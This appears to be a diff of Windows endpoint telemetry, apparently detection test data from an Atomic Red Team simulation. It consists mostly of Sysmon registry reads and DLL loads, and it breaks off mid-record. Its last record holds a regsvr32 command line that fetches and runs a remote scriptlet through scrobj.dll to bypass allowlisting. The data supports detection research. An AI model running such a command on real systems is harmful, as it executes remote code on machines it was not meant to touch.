- "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 
131883573236360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3696, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - 
"timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-00108F315401}" - }, - { - "event_type": "image_load", - "image_name": "sfc_os.dll", - "image_path": "C:\\Windows\\System32\\sfc_os.dll", - "pid": 3596, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573235890000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "process", - "pid": 3696, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883573236509984, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-00108F315401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust 
Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573236509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573236509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573236509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573236509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573236509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": 
"C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573236509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573236509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573236509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573236509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573236509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573236509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573236509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573236509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573236509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - 
"registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573236509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573236509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573236509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573236509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573236509984, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573236509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573236509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573236509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573236509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573236509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "scrobj.dll", - "image_path": "C:\\Windows\\System32\\scrobj.dll", - "pid": 3596, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573236050000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573236509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573236670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573236670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573236670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573236670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573236670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573236670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 
131883573236670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573236670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573236670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573236670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573236670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - 
"registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573236670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573236670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573236670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573236670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573236670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": 
"Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573236670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573236670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573236670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573236670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573236670000, 
- "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573236670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573236670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "dwmapi.dll", - "image_path": "C:\\Windows\\System32\\dwmapi.dll", - "pid": 3596, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573236200016, - "unique_pid": "{00000000-0000-0000-0000-000000000000}" - }, - { - "event_type": "file", - "file_name": "REGSVR32.EXE-55A4EE79.pf", - "file_path": "C:\\Windows\\Prefetch\\REGSVR32.EXE-55A4EE79.pf", - "pid": 1692, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "timestamp": 131883573236670000, - "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": 